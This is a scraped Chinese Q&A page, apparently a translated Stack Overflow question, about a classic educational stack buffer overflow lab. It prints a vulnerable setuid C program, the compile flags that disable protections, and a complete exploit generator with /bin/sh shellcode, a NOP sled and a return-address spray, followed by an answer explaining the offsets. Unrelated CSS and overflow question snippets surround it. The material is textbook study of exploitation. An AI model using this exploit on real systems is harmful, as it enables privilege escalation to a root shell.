- html - 出于某种原因,IE8 对我的 Sass 文件中继承的 html5 CSS 不友好?
- JMeter 在响应断言中使用 span 标签的问题
- html - 在 :hover and :active? 上具有不同效果的 CSS 动画
- html - 相对于居中的 html 内容固定的 CSS 重复背景?
这个特定问题已在 stackoverflow 上解决过几次,但我找不到任何以前的帖子来解决我遇到的一些问题。我想指出的是,我已经阅读了 Aleph One 的《Smashing the Stack for Fun and Profit》,但我的理解仍然存在差距。
我的问题是:这适用于 buffer[12]
中 bof() 中 stack.c 的各种缓冲区大小(生成根 shell)。至buffer[24]
。为什么它对 buffer[48]
不起作用(段错误) (这会导致段错误),例如(或者,需要如何修改程序才能使其适用于此类缓冲区)?
请注意,编译stack.c时使用了以下命令
# gcc -o stack -z execstack -fno-stack-protector stack.c
# chmod 4755 stack
ASLR 已关闭。
首先我们来看看存在漏洞的程序:stack.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int bof(char *str)
{
char buffer[12];
strcpy(buffer, str);
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}
以及利用这个的程序:test.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
// code to spawn a shell
char shellcode[] =
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
;
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}
void main(int argc, char **argv)
{
FILE *badfile;
char *ptr;
long *a_ptr;
long *ret;
int offset = 450;
int bsize = 517;
char buffer[bsize];
// a_ptr will store the return address
ptr = buffer;
a_ptr = (long *) ptr;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, bsize);
/* Fill buffer with appropriate contents */
printf("Stack Pointer (ESP): 0x%x\n", get_sp());
ret = get_sp() + offset;
printf("Address: 0x%x\n", ret);
int i;
for (i = 0; i < 350; i += 4)
*(a_ptr++) = ret;
for (i = 450; i < sizeof(shellcode) + 450; i++)
buffer[i] = shellcode[i-450];
buffer[bsize - 1] = '\0';
/*Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}
下面我将尝试解释我认为正在发生的事情,并记下我认为我的知识差距在哪里。如果有人有时间回顾一下这个问题并回答前面提到的问题,那么谢谢您。
显然,buffer[12]
当调用 strcpy() 时,stack.c 中的内容将会溢出,因为大小为 517 的字符串被复制到大小为 12 的缓冲区中。
在test.c中,我了解到我们正在创建将由stack.c读取的恶意缓冲区。该缓冲区是用一堆 NO-OP (0x90) 初始化的。除此之外,我有点困惑。
1) 在 ret = get_sp() + offset;
中将偏移量添加到 ret 有何意义? ?另外,为什么是offset = 450
?我尝试了其他偏移量值,但该程序仍然运行(例如 460)。 450 似乎是一个碰巧有效的猜测。
2) 在for (i = 0; i < 350; i += 4)
,为什么用350?我不明白这个值的意义。我相信这个循环正在用返回地址 ret
填充缓冲区的前 350 个字节。 ,但我不明白为什么是350字节。我相信我们每次都会将 i 增加 4,因为 (long *) 是 4 个字节。如果这是真的,那么这个 350 不应该也是 4 的倍数吗?
3) 再次,位于for (i = 450; i < sizeof(shellcode) + 450; i++)
(sizeof(shellcode) 是 25),为什么我们从缓冲区中的 450 开始?这就是说我们正在使用 shell 代码将 buffer[450] 填充到 buffer[475]。目前,此后的所有内容都应初始化为 NO-OP。所以呢?为什么是 450 - 475?
最佳答案
请记住,在像这样的 32 位 x86 程序中,堆栈顶部的字节从最低地址开始保存:局部变量、函数的返回地址、其参数、保存的任何寄存器由调用者、调用者的局部变量等。
该循环实际上是将 348 字节的四字节返回地址写入堆栈顶部。 (它早于 C99 和 x86_64,因此假设 long
恰好是 32 位。)这样做的目的只是为了确保,对于任何合理的局部变量存储量,返回地址都会被覆盖。它还尝试处理存在漏洞的函数从多个深度调用且堆栈顶部不再相同的情况。然后是一些带有 nop
指令的填充,因为如果函数返回到达那里的任何地方,CPU 将跳过它们。最后是机器语言的 shell 代码。重点是让返回地址指向缓冲区这部分中的任何位置。请注意,只有当漏洞利用代码可以确定调用者地址空间中堆栈指针的地址相似时,这才有效。地址空间随机化是解决这个问题的一种技术。
换句话说,代码会重复数百次,因为新进程中的内容可能不完全相同,这样,即使堆栈指针位于其期望的位置附近,它仍然可以工作。这些值是大概数字,但 Aleph One 讨论了如何找到它们。
关于C - 缓冲区溢出详细信息,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/33136811/
我有一个 div(蓝色框),它在父元素(红色框)内的页面上绝对定位,我需要将 overflow-y 设置为隐藏,以便它强制 Y 轴上的溢出内容切掉了,但我希望任何溢出-x 的内容都可见。 HTML:
请参阅以下帖子以获取突出显示我的问题和可能的解决方案的图片: CSS overflow-y:visible, overflow-x:scroll 但是,当您实际移动滚动条时,此策略会中断。在建议的实现
我在搜索中看到过几个类似的问题,但要么没有正确回答问题,要么没有给出答案。所以,我再问一次。 .parent { overflow-y:scroll; overflow-x:visible; wid
我读过这个CSS overflow-x hidden and overflow-y visible (以及很多其他帖子)但我无法在我的具体情况下使用它。 我正在使用 slick-slider并想添加下
我有以下 Spark 作业,试图将所有内容保留在内存中: val myOutRDD = myInRDD.flatMap { fp => val tuple2List: ListBuffer[(St
我有疑问 两个16位的值加上最大值,16位机会不会溢出? 我会详细说明 unsigned short a; unsigned short b; unsigned long c; c=(unsigne
我有这个 HTML 和 CSS,但“溢出:隐藏”标签在 Firefox 中不起作用。这让我感到难过...有人知道为什么它不起作用吗?是因为A标签不支持overflow标签吗? #page_sideba
我正在开发一个程序,用于在 C++ 中分解非常大的数字(20 位或更多),并且正在使用 GMP 来处理溢出问题。我的程序对于大约 10 位或更少的数字运行良好,但是当我向它抛出一个 15 位数字时,它
我创建了一个 Canvas ,并在其中放置了一个StackPanel。 StackPanel是水平的,它接受缩略图图像的列表。 Canvas 具有固定的大小。当我放置的缩略图多于Canvas宽度不能容
当 g_array_append_val() 时会发生什么或 GLib 中的其他附加/前置函数之一,使 GArray 的长度大于 guint (unsigned int) 所能容纳的长度? 文档对此没
overflow-x:hidden 和 overflow:hidden; 有什么区别? 我所知道的是overflow-x:hidden;禁用水平滚动,但当我使用它时,它不仅仅适用于 Firefox,所
我们正在运行 Solr 来索引大量数据,但遇到了一个非常有趣的问题,我无法在任何地方找到任何帮助。 似乎 Solr 使用带符号的 32 位整数来计算索引中当前的文档数。我们刚刚达到了这个数字,我们的
这是我的查询: 从相似性中选择 COUNT(*),其中 T1Similarity = 0 或 T2Similarity = 0 结果如下: Msg 8115, Level 16, State 2, L
int main(void) { char x1 = 0x81; char x2 = 0x1; int a, b; a = x1
我有一个 div,其中的内容通过查询的 append() 定期附加到它。随着内容越来越长,最终会溢出div。我不希望在溢出时出现滚动条,但仍然让内容向上滚动以显示下面的新内容。 这可能吗?当我使用 o
我为 UITextField 创建了一个简单的子类,它按预期工作。我遇到的唯一问题是当文本值变得太大时,它会溢出到清除按钮中。 我似乎无法找到如何仅更改文本的右侧以具有一些填充而不与清除按钮相交的方法
我想要一个包括下拉菜单的粘性导航栏。但是,当我将鼠标悬停在它上面时,下拉菜单没有显示。 如果我删除 overflow: hidden;在无序列表中,当我向下滚动时,导航栏设法保持在顶部,但是导航栏是不
我正在研究一些按钮。我想要一个翻转状态,我在一个 div 的图像中有这个,溢出:隐藏以隐藏不活动的状态。它有时有效,但有时看起来像这样: 最奇怪的是,当我尝试使用 Chrome Web Inspect
基本上,我正在尝试创建一个六边形形状,它内部有一个圆圈,圆圈的多余部分应该被隐藏。演示:https://codepen.io/AskSaikatSinha/pen/jwXNPJ?editors=110
这似乎是一个相当常见且不那么奇特的用例,但我以前没有遇到过。我设置了一支笔,但无法在那里复制它,我正在努力找出原因。 Demo Pen 左侧边栏有一个用于元素列表的自定义滚动窗口,但是虽然设置 ove
我是一名优秀的程序员,十分优秀!